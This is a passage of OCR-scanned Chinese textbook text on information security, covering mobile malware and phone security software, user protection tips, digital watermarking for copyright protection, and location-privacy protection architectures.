控 者 的 设置 ， 定 时 上 传 到 服务 器 上 ， 监 控 者 可 以 登录 到 服务 器 上 进行 查看 。 

大 多 数 系统 破坏 类 恶意 软件 都 会 非法 获取 系统 的 最 高 权限 ， 即 Root 权限 。 获 取 最 
高 权限 后 ， 恶 意 软件 可 以 强行 结束 安全 防护 软件 的 进程 ， 将 自身 程序 移动 到 系统 程序 目 
录 以 伪装 成 系统 应 用 ， 使 自己 无 法 被 卸载 ， 破 坏 了 用 户 的 手机 系统 。 
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此 外 ， 还 有 许多 其 他 种 类 的 恶意 软件 ， 比 如 仿冒 正规 软件 的 诱骗 欺诈 类 程序 ， 制 作 
者 不 以 牟利 为 目的 的 资源 消耗 类 程序 等 ， 也 严重 影响 了 用 户 的 正常 使 用 和 手机 系统 的 安 
全 。 而 且 ， 随 着 设计 和 编写 技术 的 不 断 提高 ， 许 多 恶意 软件 的 恶意 行为 趋 于 多 样 化 ， 同 
时 具有 多 种 恶意 行为 特征 ， 给 用 户 造 成 了 多 种 威胁 。 

借鉴 传统 PC 平台 的 安全 防护 思路 ， 结 合 移动 智能 终端 的 特点 ， 许 多 安全 厂商 推出 
了 自己 的 安全 防护 产品 ， 在 Android 平台 和 Symbain 平台 上 ， 已 有 多 款 安全 防护 类 软 
件 ， 壁 如 360 手机 卫士 、 金 山手 机 卫士 、 网 秦 手 机 卫士 和 QQ 手机 管家 〈 原 QQ 安全 
助手 ) 等 。 

目前 面向 智能 手机 的 安全 防护 技术 手段 主要 可 以 分 为 以 下 种 类 : AERAR A 
扰 拦截 、 网 络 防火 墙 、 软 件 管理 、 系 统 优化 、 隐 私 保护 、 手 机 防盗 。 

同 PC 平台 类 似 ， 手 机 上 的 病毒 木马 扫描 也 是 基于 病毒 库 和 特征 值 匹配 技术 的 。 也 
有 些 厂商 推出 了 联网 “ 云 查 杀 ” 来 确认 可 疑 软件 。 如 网 秦 手 机 卫士 就 采用 了 “ 云 + 端 ” 
的 双 引 擎 查 杀 方式 。 

对 于 骚扰 拦截 ， 系 统 允 许 用 户 将 垃圾 短信 和 骚扰 电话 加 入 到 黑 名 单 中 ， 短 信 接 收 或 
电话 呼 入 时 ， 若 号 码 与 黑 名 单 中 的 号 码 匹 配 ， 则 进行 拦截 。 如 金山 手机 卫士 ， 能 够 拦截 

告 、 诈 骗 、 扣 费 短 信 、 响 一 声 电话 等 ， 防 止 恶意 骚扰 。 

网 络 防火 墙 同 PC 上 的 防火 墙 意义 不 同 ， 智 能 手机 上 的 防火 墙 大 多 仅仅 具有 流量 统 
计 和 限制 应 用 程序 进行 网 络 连接 的 功能 ， 当 每 月 累积 流量 超出 用 户 设置 的 限额 时 ， 提 示 
用 户 停止 网 络 连接 以 节省 资费 ， 如 QQ 手机 管家 的 上 网 管理 。 

软件 管理 严格 意义 上 说 这 并 不 是 一 种 安防 手段 ， 只 是 安防 软件 为 用 户 提供 的 一 个 更 
方便 安装 卸载 应 用 程序 的 工具 。 如 QQ 手机 管家 , 不 仅 能 管理 已 安装 程序 和 安装 包 ， 还 
上 共有 一 站 式 下 载 安全 绿色 的 装机 必 备 等 软件 的 功能 。 

系统 优化 是 指 查看 系统 的 运行 状态 , 包括 内 存 、CPU 使 用 率 等 信息 ,优化 用 户 的 系 
统 速度 ， 清 理 缓存 和 垃圾 文件 ， 关 闭 后 台 运行 的 进程 ， 如 360 优化 大 师 。 

隐私 保护 将 涉及 隐私 的 短信 、 联系 人 、 通话 记录 等 内 容 加 密 存储 到 手机 特定 的 位 置 ， 
防止 隐私 数据 泄露 。 金 山手 机 卫士 提供 的 私密 空间 ， 能 加 密 保护 个 人 信息 ， 防 止 他 人 偷 
看 ， 保 护 隐私 安全 。 

手机 防盗 一 旦 用 户 的 手机 丢失 ， 可 以 定位 手机 的 位 置 ， 若 SIM 卡 被 更 换 ， 则 会 发 
送 短信 到 指定 的 手机 号 码 。 如 360 手机 卫士 ， 检 测 到 更 换 SM 卡 后 自动 锁 机 ， 远 程控 
制 保护 隐私 。 除 此 之 外 ，Android 平台 上 也 出 现 了 以 “主动 防御 ”而 知名 的 安全 防护 软 
件 ,比如 LBE 小 组 开发 的 LBE 隐私 卫士 和 LBE 安全 大 师 。 采 用 类 似 PC 上 进程 Hook 
的 API 拦截 技术 LBE 隐私 卫士 和 LBE 安全 大 师 能 够 实时 监控 和 动态 拦截 系统 中 的 

虽然 目前 安全 防护 软件 众多 ， 在 一 定 程度 上 能 起 到 保护 用 户 隐 私 和 财产 安全 的 作 
用 。 但 是 ， 大 多 安防 软件 思路 类 似 ， 功 能 雷同 ， 并 且 还 有 诸多 问题 和 缺陷 。 安 全 防护 软 
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件 的 病毒 木马 查 杀 和 “ 云 查 杀 ”功能 ， 是 基于 特征 值 扫描 技术 的 。 一 方面 ， 智 能 手机 的 
物理 资源 和 电池 续航 能 力 有 限 ， 病 毒 查 杀 会 占用 较 多 物理 资源 ， 加 速 电 量 消耗 ， 给 用 户 
的 正常 使 用 带 来 较 大 影响 ; 另 一 方面 ， 频 繁 更 新 病毒 库 或 者 “ 云 查 杀 ” 需 要 连接 互联 网 
可 能 会 给 用 户 带 来 额外 的 流量 费用 。 而 且 ， 基 于 特征 值 的 扫描 技术 是 依赖 病毒 库 的 ， 对 
于 病毒 库 中 不 存在 的 病毒 ， 便 无 能 为 力 了 。 面 对 每 天 都 会 产生 的 各 种 新 型 恶意 程序 及 其 
变种 ， 这 种 方法 具有 不 可 避免 的 滞后 性 。 这 也 使 得 利用 该 技术 的 安全 产品 的 安全 防护 性 
E 打 了 大 大 的 折扣 。LBE 安全 大 师 和 LBE 隐私 卫士 这 类 “主动 防御 ”安全 防护 软件 ， 
虽然 做 到 了 动态 拦截 敏感 操作 ， 但 是 对 于 每 个 敏感 操作 的 放行 或 者 阻止 留 给 了 用 户 去 选 
择 。 普 通用 户 难以 判断 敏感 操作 是 否 是 应 用 程序 的 正常 行为 ， 也 难以 判断 是 否 会 带 来 安 
全 风险 。 这 种 基于 单个 API 的 拦截 无 法 自主 判断 软件 的 恶意 性 ， 这 和 主动 防御 基于 行 
为 自主 分 析 判 断 恶意 软件 是 有 非常 大 的 区 别 的 。 
至 于 手机 防火 墙 、 手 机 防盗 功能 也 往往 没有 想象 中 的 有 效 。 由 于 只 能 监控 流量 和 限 
制 应 用 程序 对 外 的 网 络 连接 ， 没 有 真正 做 到 手机 系统 与 外 部 网 络 的 隔离 ， 因 此 手机 防火 
墙根 本 无 法 阻止 攻击 者 从 外 部 入 侵 用 户 的 手机 。 并 且 安全 防护 软件 也 只 是 运行 在 手机 中 
的 普通 应 用 程序 ， 一 旦 系统 恢复 出 厂 设 置 ， 那 么 安全 防护 软件 同 其 他 非 系统 软件 一 样 ， 
也 是 会 被 清除 的 ， 无 法 达到 手机 防盗 的 目的 。 

手机 系统 的 防范 措施 如 下 : 

CL) 不 断 增强 手机 安全 防护 意识 。 

通过 各 种 渠道 获取 手机 安全 相关 知识 ， 现 在 互联 网 上 有 很 多 相关 的 知识 文章 ， 也 可 
以 通过 专业 书籍 进行 必要 的 学 习 。 

(2) 安装 专业 的 安全 防护 软件 。 

手机 上 必须 安装 专业 的 安全 防护 软件 ， 控 制 好 手机 中 各 种 软件 的 权限 。 同 时 ， 定 期 
查 杀 、 清 理 手机 ， 对 于 陌生 的 短信 、 号 码 进 行 拦截 处 理 ， 保 证 手机 安全 。 如 360 安全 卫 
士 ， 金 山手 机 卫士 等 。 

(3) 不 要 随便 安装 不 明 的 软件 。 

一 定 要 通过 正规 的 互联 网 网 站 或 者 手机 网 站 下 载 软件 , 包括 工具 软件 、 游 戏 软件 等 。 

(4) 不 要 随便 打开 未 知 的 链接 。 

在 接收 手机 短信 或 彩信 中 ， 如 果 包 括 有 一 些 网 址 链接 等 ， 不 要 随便 打开 ， 一 定 要 在 
操作 之 前 想 一 想 ， 问 一 问 。 

(5) 二 维 码 不 要 随便 扫 。 

二 维 码 技术 现在 已 经 广 范 应 用 ， 大 街 上 、 商 场 、 网 上 有 很 多 的 二 维 码 ， 在 进行 扫描 
之 前 一 定 要 进行 安全 确认 ， 因 为 有 些 恶 意 代 码 也 隐藏 其 中 。 

(6) 免费 的 Wifi 有 风险 。 

随 着 无 线 网 络 的 普及 ,很 多 地 方 提供 了 开放 的 Wf 网 络 , 给 人 们 带 来 了 很 大 的 方便 
性 ， 不 过 ， 你 也 要 注意 “世界 没有 免费 的 午餐 ”， 有 些 打 着 “免费 ”旗号 的 未 必 是 真 的 
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是 “免费 的 ”， 不 知 不 觉 中 你 的 个 人 隐私 信息 可 能 会 被 人 盗窃 。 

(7) 工作 相关 的 文件 资料 不 要 存在 手机 中 。 

一 些 工 作文 档 、 照 片 、 视 频 等 资料 尽量 不 要 存储 在 手机 中 ， 还 有 比较 敏感 的 通知 也 
不 要 通过 短信 发 送 。 

(8) 手机 密码 锁 。 

现在 智能 终端 一 般 都 支持 手机 密码 锁 ， 设 置 必要 的 开机 密码 ， 别 人 拿 到 你 的 手机 他 
也 是 看 不 到 里 面 的 信息 的 。 

(9) 非 必要 不 要 Root FHL. 

一 般 Android 系统 提供 的 权限 足够 手机 实现 很 多 功能 了 ， 没 必要 为 了 多 点 功能 而 冒 
着 信息 被 盗 的 危险 。 

随 着 移动 互联 网 的 高 速 发 展 ，“ 人 人 时 时 处 处 在 线 ”、“ 人 人 都 是 信息 源 ” 成 为 现 
实 ， 移 动 智 能 终端 和 移动 互联 网 安全 将 会 面临 更 加 严峻 的 挑战 。 从 目前 的 数据 和 发 展 趋 
势 可 以 预测 ， 未 来 的 移动 互联 网 安全 攻防 仍 将 围绕 移动 智能 终端 展开 。 移 动 智能 终端 将 
会 越 来 越 开放 和 智能 ， 越 来 越 贴近 个 人 ， 承 载 的 用 户 信 息 会 更 有 价值 。 同 时 ， 移 动 智能 
终端 不 断 扩展 的 办 公 、 支 付 等 业务 功能 ， 也 会 承载 更 巨大 的 商业 价值 。 攻 防 形式 方面 ， 
巨大 的 经 济 利益 将 会 刺激 恶意 软件 继续 增长 ， 在 攻击 者 与 安全 厂商 的 博弈 过 程 中 ， 安 全 
厂商 将 会 继续 处 于 被 动 地 位 。 安 全 厂商 与 移动 智能 终端 制造 商 ， 系 统 提供 商 和 移动 互联 
网 服务 提供 商 的 合作 , 也许 能 成 为 降低 移动 智能 终端 及 移动 互联 网 安全 威胁 的 有 效 措施 。 
相信 在 未 来 很 长 一 段 时 间 内 ， 如 何 做 好 用 户 隐私 和 财产 安全 的 防护 ， 仍 将 是 一 个 非常 重 
要 的 课题 。 移 动 智能 终端 用 户 也 应 提升 自身 的 安全 防护 意识 ， 减 少 各 类 安全 威胁 造成 的 
损失 。 


8.4 数字 水 印 在 版 权 保 护 中 的 应 用 


随 着 多 媒体 技术 和 数字 传输 的 迅猛 发 展 ， 互 联网 络 上 的 数字 媒体 应 用 正在 呈 爆 炸 式 
的 增长 。 数 字 信 号 处 理 和 网 络 传输 技术 可 以 对 数字 媒体 (数字 声音 、 文 本 、 图 像 和 视频 ) 
的 原版 进行 无 限制 的 任意 编辑 、 修 改 、 拷 贝 和 散布 ， 造 成 数字 媒体 作品 的 原创 者 巨大 的 
经 济 损失 ， 并 对 数字 媒体 的 安全 权限 提出 了 挑战 ， 促 使 数字 媒体 的 知识 产权 保护 和 信息 
安全 问题 日 益 突出 ， 并 已 成 为 数字 世界 的 一 个 非常 重要 和 紧迫 的 问题 。 

数字 水 印 技术 是 通过 数字 信号 处 理 的 方法 ， 在 数字 化 的 多 媒体 数据 中 嵌入 隐蔽 的 水 
印 标记 ， 可 以 应 用 于 开放 的 网 络 环境 下 的 多 媒体 数字 作品 的 版 权 保护 ， 可 验证 数字 产品 
的 版 权 拥 有 者 、 识 别 销售 商 、 购 买 者 或 提供 关于 数字 产品 内 容 的 其 他 附加 信息 ， 并 将 这 
些 信 息 以 人 眼 不 可 见 的 形式 嵌入 在 数字 图 像 或 视频 序列 中 ， 用 于 确认 数字 产品 的 所 有 权 
和 跟踪 侵权 行为 。 除 此 之 外 ， 它 在 证 据 自 改 鉴定 ， 数 据 的 分 级 访问 ， 数 据 产品 的 跟踪 和 
检测 ， 商 业 视频 广播 和 因特网 数字 媒体 的 服务 付费 ， 电 子 商 务 的 认证 鉴定 ， 商 务 活动 中 
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的 票据 防伪 等 方面 也 具有 十 分 广阔 的 应 用 前 景 。 

数字 水 印 的 应 用 领域 包括 以 下 几 个 方面 

@ 版 权 保护 ， 即 数字 作品 的 所 有 者 可 用 密 钥 产生 一 个 水 印 ， 并 将 其 嵌入 原始 数据 ， 
然后 公开 发 布 他 的 水 印 版 本 作品 。 当 该 作品 被 盗版 或 出 现 版 权 纠纷 时 ， 所 有 者 即 可 利用 
数字 水 印 方法 从 盗版 作品 或 水 印 版 作品 中 获取 水 印信 号 作为 依据 ， 从 而 保护 所 有 者 的 
权益 。 

© 加 指纹 : 为 避免 未 经 授权 的 拷贝 制作 和 发 行 ， 出 品 人 可 以 将 不 同 用 户 的 JP 或 序 
列 号 作为 不 同 的 水 印 〈 指 纹 ) 嵌入 作品 的 合法 拷贝 中 。 一 旦 发 现 未 经 授权 的 拷贝 ， 就 可 
以 根据 此 拷贝 所 恢复 出 的 指纹 来 确定 它 的 来 源 。 

© 标题 与 注释 : 即将 作品 的 标题 、 注 释 等 内 容 (一 幅 照 片 的 拍摄 时 间 和 地 点 等 ) 
以 水 印 形式 嵌入 该 作品 中 ， 这 种 隐 式 注释 不 需要 额外 的 带宽 ， 且 不 易 丢 失 。 

© 算 改 提示 : 当 数 字 作品 被 用 于 法 庭 、 医 学 、 新 闻 及 商业 时 ， 常 需 确定 它们 的 内 
容 是 否 被 修改 、 伪 造 或 特殊 处 理 过 。 为 实现 该 目的 ， 通 常 可 将 原始 图 像 分 成 多 个 独立 块 ， 
再 将 每 个 块 加 入 不 同 的 水 印 。 同 时 可 通过 检测 每 个 数据 块 中 的 水 印信 号 ， 来 确定 作品 的 
完整 性 。 与 其 他 水 印 不 同 的 是 ， 这 类 水 印 必须 是 脆弱 的 ， 并 且 检测 水 印信 号 时 ， 不 需要 
原始 数据 。 

© 使 用 控制 : 这 种 应 用 的 一 个 典型 的 例子 是 DVD 防 拷贝 系统 ， 即 将 水 印信 息 加 入 
DVD 数据 中 ， 这 样 DVD 播放 机 即 可 通过 检测 DVD 数据 中 的 水 印信 息 而 判断 其 合法 性 
和 可 拷贝 性 。 从 而 保护 制造 商 的 商业 利益 。 


8.4.1 数字 版 权 保护 系统 的 需求 分 析 


数字 水 印 应 用 在 数字 作品 的 版 权 保护 中 必须 满足 以 下 基本 应 用 需求 : 

@ 数字 水 印 的 隐蔽 性 : 图 像 在 加 入 水 印 后 不 能 改变 图 像 的 视觉 效果 ， 水 印 在 通常 
的 视觉 条 件 下 不 可 见 。 

© 数字 水 印 的 鲁 棒 性 : 加 过 水 印 的 图 像 通过 普通 的 图 像 处 理 技术 和 标准 压缩 后 水 
印 仍 保持 在 图 像 之 中 并 能 被 检测 出 来 。 水 印 的 图 像 在 经 印刷 、 打 印 、 扫 描 等 模 数 和 数 模 
转换 后 仍 能 检测 出 水 印 。 

@ 数字 水 印 的 安全 性 : 未 经 授权 者 不 能 伪造 水 印 或 检测 出 水 印 。 


8.4.2 ”基于 数字 水 印 的 数字 版 权 保护 系统 体系 架构 


数字 水 印 是 将 一 些 诸如 水 印 、 数 字 签名 、 标 签 或 者 商标 等 水 印信 息 嵌 入 到 多 媒体 对 
象 中 以 至 于 事后 水 印 能 够 被 检测 或 提取 出 来 的 一 个 过 程 ， 从 而 能 够 证 明 多 媒体 对 象 的 所 
有 权 。 多 媒体 对 象 可 以 是 图 像 、 音 频 或 者 视频 。 数 字 水 印 的 一 个 简单 例子 就 是 一 个 可 见 
的 印章 被 置 于 图 像 上 来 标识 版 权 。 然 而 ， 水 印 可 能 还 包含 一 些 附 加 信息 ， 这 些 附 加 信息 
又 包含 了 多 媒体 对 象 副本 购买 者 的 身份 标识 。 
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通常 ， 任 何 一 个 数字 水 印 算法 都 由 3 部 分 组 成 : 

@ 水 印 ; 

@ 编码 器 (也 称 之 为 嵌入 算法 ); 

© 解码 器 和 比较 器 (也 称 之 为 验证 算法 ,还 可 以 称 之 为 提取 算法 或 检测 算法 )。 每 一 
个 所 有 者 都 有 唯一 的 水 印 ， 或 者 一 个 所 有 者 能 够 将 不 同 的 水 印 嵌 入 到 不 同 的 对 象 中 。 媒 
入 算法 将 水 嵌入 到 对 象 中 ， 把 水 印 和 对 象 合 为 一 体 。 验 证 算法 用 于 鉴别 对 象 以 决定 其 所 
有 者 和 其 完整 性 。 

数字 水 印 的 数字 版 权 保护 系统 主要 包括 三 部 分 ， 如 图 8-5 所 示 。 

O 编码 过 程 ， 通 过 在 原始 图 像 中 嵌入 具备 版 权 标识 的 水 印信 息 ， 生 成 可 发 布 的 水 
印 图 像 ; 

© 解码 过 程 ， 通 过 对 具备 版 权 标 识 水 印 图 像 的 检测 ， 提 取出 嵌入 的 水 印信 息 ; 

@ 水 印 验证 过 程 ， 通 过 对 提取 的 水 印信 息 和 用 户 版 权 标 识 信息 之 间 进 行 对 比分 析 ， 
鉴定 该 作品 的 版 权 用 户 。 
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图 8-5 数字 水 印 工作 原理 
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8.4.3 数字 版 权 保护 系统 的 常用 数字 水 印 技术 


目前 已 有 的 数字 水 印 算法 主要 包括 以 下 几 种 : 

© 空域 水 印 算法 : 该 类 算法 中 典型 的 水 印 算 法 是 将 信息 柑 入 到 随机 选择 的 图 像 点 
中 最 不 重要 的 像素 位 (LSB: least significant bits) 上 ， 这 可 保证 嵌入 的 水 印 是 不 可 见 的 。 
但 是 由 于 使 用 了 图 像 不 重要 的 像素 位 ， 算 法 的 鲁 棒 性 差 ， 水 印信 息 很 容易 被 滤波 、 图 像 
量化 、 几 何 变形 的 操作 破坏 。 

@ 变换 域 水 印 算法 : 该 类 算法 中 ， 大 部 分 水 印 算法 采用 了 扩展 频谱 通信 (spread 
spectrum communication) 技术 。 该 类 方法 即使 当 水 印 图 像 经 过 一 些 通用 的 几何 变形 和 信 
号 处 理 操作 而 产生 比较 明显 的 变形 后 仍然 能 够 提取 出 一 个 可 信赖 的 水 印 拷贝 。 还 可 以 将 
数字 图 像 的 空间 域 数 据 通过 离散 傅 里 叶 变 换 (DFT) 或 离散 小 波 变换 (DWT) 转化 为 相 
应 的 频 域 系数 。 该 类 算法 的 隐藏 和 提取 信息 操作 复杂 ， 隐 藏 信息 量 不 能 很 大 ， 但 抗 攻击 
能 力 强 ， 适 合 于 数字 作品 版 权 保护 的 数字 水 印 技术 中 。 

@ 压缩 域 水 印 算法 : 基于 JPEG、MPEG 标准 的 压缩 域 数字 水 印 系统 不 仅 节 省 了 大 
量 的 完全 解码 和 重新 编码 过 程 ， 而 且 在 数字 电视 广播 及 VOD (Video on Demand) 中 有 
很 大 的 实用 价值 。 相 应 地 ， 水 印 检测 与 提取 也 可 直接 在 压缩 域 数据 中 进行 。 


8.4.4 ”数字 版 权 保护 系统 技术 标准 


数字 水 印 的 标准 化 工作 在 近 几 年 取得 了 很 大 的 进展 ， 是 著名 的 美国 “电子 文档 保护 
技术 组 织 ” (CPTWG) 最 初 是 为 了 制定 DVD 格式 所 需 的 电子 文档 保护 措施 而 成 立 的 。 
1998 年 ，CPTWG 成 立 了 专门 的 “数据 隐藏 小 组 ” (DHSG) 来 制定 电子 文档 保护 水 印 
的 技术 标准 ， 在 完成 了 影像 数据 的 加 密 方式 CSS 的 标准 化 工作 以 后 ， 于 1998 年 2 月 又 
建立 了 用 于 “IEEE-1394” 串 联接 口 的 非法 拷贝 防止 技术 。 

“美国 唱片 工业 联合 会 ” (Recording Industry Association of America, RIAA) 及 大 唱 
片 公司 于 1999 年 2 月 成 立 了 业界 团体 “安全 数字 音乐 促进 组 织 ” (Secure Digital Music 
Initiative, SDMI) 。 该 团体 于 1999 年 9 月 在 电子 文档 保护 技术 “Phasel ”中 采用 了 Verance 
公司 的 数字 水 印 ， 用 以 保护 在 Internet 上 发 布 的 数字 音频 文件 。 

“动态 图 像 专家 组 ” (Moving Pictures Experts Group，MPEG) 工作 组 也 开始 利用 数 
字 水 印 进行 信息 电子 文档 保护 , 并 在 1999 年 12 月 第 51 届 大 会 上 成 立 了 AHG (Ad Hoc 
Group) 特 设 小 组 ， 专 门 负责 数字 水 印 在 MPEG 中 的 标准 化 工作 。 

在 国内 ， 政 府 对 信息 安全 产业 的 发 展 极为 重视 。2005 年 国家 颁布 了 《中 华人 民 共 和 
国电 子 签名 法 》， 这 给 水 印 技术 的 应 用 提供 了 必要 的 法 律 依据 。 
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8.5 位 置 隐私 保护 技术 的 应 用 


随 着 个 人 计算 机 与 通信 设备 的 发 展 与 普及 ， 人 们 已 能 随时 随地 连接 到 网 络 并 发 送 或 
接收 信息 。 这 种 通信 方式 在 给 人 们 的 生活 与 工作 带 来 便利 的 同时 ， 也 带 来 了 新 的 安全 隐 
患 。 个 人 位 置 隐私 作为 其 中 一 个 重要 的 安全 问题 ， 近 年 来 受到 国内 外 研究 机 构 的 广泛 关 
注 与 深入 研究 。 所 谓 个 人 位 置 隐私 ， 是 指 由 于 服务 或 系统 需要 用 户 提供 自身 的 “身份 ， 
人 位置， 时间” 三 元 组 信息 而 导致 的 用 户 隐私 泄露 问题 。 

目前 ， 基 于 位 置 的 服务 LBS (Location-Based Services) 吸引 了 众多 的 移动 用 户 。 常 
见 的 例子 包括 兴趣 点 POI (Points of Interest) 查找 ， 用 户 通过 智能 终端 上 的 应 用 (APP) 
向 服务 提供 者 提交 自己 的 位 置信 息 ， 服 务 提 供 者 则 根据 服务 类 型 进行 反馈 ， 如 返回 最 近 
的 餐馆 、 有 空位 的 停车 场 等 信息 。 在 智能 交通 系统 中 ， 车 载 网 络 采 用 的 专用 短程 通信 标 
准 要 求 行进 中 的 车 辆 每 300ms 广播 一 次 包含 车 辆 当前 位 置 、 速 度 等 信息 的 信 标 消息 。 若 
收集 并 分 析 这 些 用 户 发 送 的 数据 ， 则 可 能 得 到 用 户 的 消费 水 平 、 日 程 安排 等 信息 。 以 手 
机 终端 为 例 ， 根 据 中 国 互联 网 络 信息 中 心 (CNNIC) 于 2014 年 8 月 发 布 的 《中 国 移动 
互联 网 调查 研究 报告 》 和 截至 2014 年 6 月 底 ,我 国手 机 网 民 规模 为 5.27 亿 , 其 中 约 有 46.9% 
的 手机 网 民 使 用 手机 地 图 。 手 机 地 图 用 户 中 有 57.6% 的 用 户 使 用 定位 功能 ， 有 40.8% 的 
用 户 使 用 查询 周边 美食 餐饮 服务 功能 ， 有 24.4% 的 用 户 使 用 签到 或 位 置信 息 分 享 功能 。 
手机 地 图 这 类 APP 收集 了 大 量 用 户 的 位 置信 息 ， 并 发 送 给 服务 提供 者 或 发 布 到 网 络 上 ， 
这 无 疑 对 是 个 人 隐私 的 重要 威胁 。 

位 置信 息 〈 及 其 他 相关 信息 ) 是 获得 服务 或 完成 系统 预期 功能 的 必要 信息 ， 但 这 些 
信息 也 带 来 了 巨大 的 安全 隐患 。 在 移动 智能 终端 广泛 普及 的 今天 ， 对 手 能 够 通过 移动 应 
用 或 移动 网 络 收集 更 多 用 户 位 置信 息 , 从 而 更 容易 掌握 用 户 的 生活 规律 (如 上 下 班 时 间 、 
喜欢 去 的 超市 等 ) 与 个 人 隐私 (如 家 庭 住址 、 最 近 是 否 去 医院 等 )， 并 实施 进一步 的 目的 
(如 贩卖 个 人 信息 、 实 施 偷窃 等 )。 显 然 ， 享 受 位 置信 息 带 来 的 便利 与 保护 位 置 隐私 是 一 
对 相互 制约 的 概念 : 前 者 需要 提供 尽 可 能 精确 的 位 置 ， 而 后 者 需要 尽 可 能 隐藏 用 户 的 位 
置 。 因 此 ， 个 人 位 置 隐私 保护 是 影响 用 户 使 用 上 述 服务 或 系统 的 决定 性 因素 之 一 ， 也 是 
关乎 社会 稳定 的 关键 技术 之 一 ， 研 究 人 员 针 对 位 置 隐私 提出 了 很 多 保护 措施 。 下 面 针 对 
位 置 隐私 这 一 特定 应 用 场景 介绍 当前 存在 的 隐私 保护 方法 ， 并 对 位 置 隐私 大 匿名 方法 进 
行 详 细 介绍 。 


8.5.1 ”位置 隐私 保护 介绍 


8.5.1.1 体系 结构 
位 置 隐私 保护 体系 结构 可 分 为 三 种 : 集中 式 体系 结构 、 客 户 -服务 器 体系 结构 和 分 布 
式 体系 结构 。 
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集中 式 体 系 结构 是 指 在 移动 用 户 和 位 置 服务 提供 商 之 间 设 置 一 个 可 信 第 三 方 匿名 
服务 器 ， 因 此 也 被 称 为 可 信 第 三 方 体系 结构 。 可 信 第 三 方 匿名 服务 器 主要 负责 收集 当前 
移动 用 户 的 精确 位 置 ,并 对 精确 的 位 置信 息 进行 匿名 处 理 以 及 对 返回 的 查询 结果 求 精 等 。 
在 移动 用 户 与 位 置 服务 提供 商 之 间 加 入 可 信 第 三 方 中 间 件 ， 可 以 避免 位 置 服务 提供 商 不 
可 信和 或 者 不 安全 的 问题 。 例 如 ， 有 一 些 不 负责 任 的 服务 提供 商会 出 于 商业 利益 将 其 收集 
的 用 户 精确 的 位 置信 息 卖 给 其 他 第 三 方 机 构 ， 从 而 造成 用 户 的 隐私 受到 威胁 。 如 图 8-6 
所 示 ， 匿 名 服务 器 接收 移动 用 户 的 原始 查询 请 求 并 进行 匿名 化 处 理 ， 匿 名 化 是 将 用 户 的 
精确 位 置 扩展 成 一 个 包含 至 少 个 用 户 的 伪装 区 域 ， 这 样 原始 查询 就 变换 为 匿名 查询 。 
然后 用 匿名 查询 替代 用 户 精 确 位 置 发 送 给 位 置 服务 提供 商 ， 位 置 服务 提供 商 根据 匿名 服 
务 器 提交 的 匿名 请 求 进行 搜索 ， 再 将 搜索 结果 (包含 正确 结果 的 候选 集 ) 返回 给 匿名 服 
务 器 。 最 后 ， 匿 名 服务 器 青 将 查询 结果 过 滤 ， 把 真实 的 结果 返回 给 用 户 。 该 结构 的 不 足 
在 于 匿名 服务 器 是 系统 的 瓶颈 ， 计 算 负担 繁重 ， 匿 名 服务 器 一 旦 被 攻破 ， 系 统 会 泄露 大 
量 隐私 信息 。 
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图 8-6 集中 式 体系 结构 


客户 -服务 器 体系 结构 是 指 隐私 保护 操作 直接 在 移动 客户 端 进行 , 移动 客户 端 将 位 置 
模糊 化 后 的 查询 请 求 提 交 给 位 置 服务 提供 商 ， 位 置 服务 提供 商 根据 查询 请 求 将 候选 结果 
集 返 回 ， 移 动 客户 端 对 候选 结果 集 进行 过 滤 以 得 到 真实 的 查询 结果 ， 如 图 8-7 所 示 。 该 
体系 结构 要 求 所 有 的 移动 客户 端 拥 有 能 够 自 定位 以 及 强大 的 计算 能 力 和 存储 能 力 。 在 客 
户 -服务 器 体系 结构 下 ， 移 动用 户 可 以 根据 自身 的 位 置 隐 私 保护 需求 ， 完 成 对 自身 精确 位 
置信 息 匿 名 处 理 的 工作 。 这 种 体系 结构 的 优点 是 结构 简单 ， 与 集中 式 体系 结构 相 比 ， 无 
须 依赖 可 信 第 三 方 匿名 服务 器 ， 容 易 与 其 他 技术 结合 ， 有 较 好 的 容错 能 力 。 但 是 ， 该 结 
构 对 客户 端的 要 求 比较 高 ， 增 加 了 客户 端 负担 。 并 且 ， 匿 名 化 过 程 无 法 使 用 其 他 用 户 的 
信息 ， 大 匿名 、/- 多 样 性 等 隐私 约束 较 难 实现 。 
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图 8-7 客户 -服务 器 体系 结构 


分 布 式 体系 结构 是 指 移动 用 户 通过 P2P 方式 与 其 他 用 户 协作 来 实现 位 置 隐私 保护 ， 
无 须 依赖 可 信 第 三 方 。 如 图 8-8 所 示 ， 该 体系 结构 的 典型 工作 模式 为 客户 端 发 出 一 个 查 
询 请 求 时 ， 广 播 一 组 消息 给 邻居 节点 ， 然 后 随机 选择 一 个 成 员 作为 查询 发 送 者 ， 发 送 者 
将 伪装 区 域 发 送 给 位 置 服务 提供 商 ， 位 置 服务 提供 商 返 回 候选 集 给 客户 端 ， 客 户 端 对 结 
果 进 行 筛选 ， 把 正确 的 结果 返回 给 用 户 。 分 布 式 体系 结构 中 每 个 节点 都 可 以 完成 对 精确 
位 置信 息 的 匿名 处 理 和 查询 结果 求 精 等 工作 ， 节 点 之 间 具 有 平等 性 ， 这 将 避免 集中 式 体 
系 结构 中 位 置 匿 名 服务 器 是 处 理 瓶 开 和 易 受 攻击 等 缺点 。 在 分 布 式 结构 中 ， 匿 名 处 理 过 
程 可 以 是 由 提出 服务 请 求 的 用 户 本 身 完成 ， 也 可 以 由 从 匿名 组 中 选 出 的 头 结 点 完成 。 位 
置 服务 提供 商 在 收 到 匿名 处 理 后 的 查询 请 求 时 ， 可 以 将 查询 结果 集 发 送 给 用 户 ， 由 用 户 
自己 挑选 出 真实 的 结果 ， 也 可 以 将 查询 结果 集 返 回 给 头 结 点 ， 由 头 结 点 选择 出 符合 需求 
的 结果 发 送 给 提出 查询 的 用 户 。 所 以 在 分 布 式 体系 结构 中 ， 除 了 与 其 他 两 种 体系 结构 相 
同 的 匿名 处 理 任务 之 外 ， 还 需要 合理 选择 头 结 点 ， 以 平 稀 整个 网 络 的 负载 。 
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图 8-8 分布 式 体系 结构 
8.5.1.2 ”保护 目标 
在 讨论 位 置 隐私 保护 的 具体 技术 和 方法 之 前 ， 我 们 需要 定义 不 同 保护 方法 的 保护 目 
标 。 保 护 目标 是 指 移动 用 户 的 哪些 属性 信息 需要 受到 保护 ， 这 些 信息 一 旦 泄露 ， 会 对 用 
户 的 生命 财产 安全 造成 威胁 。 通 常情 况 下 ， 被 保护 的 属性 主要 包括 用 户 的 身份 (ID)、 
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空间 信息 位置 POS) 和 时 态 信息 〈 时 间 Time) 三 类 。 

1. 用 户 身份 

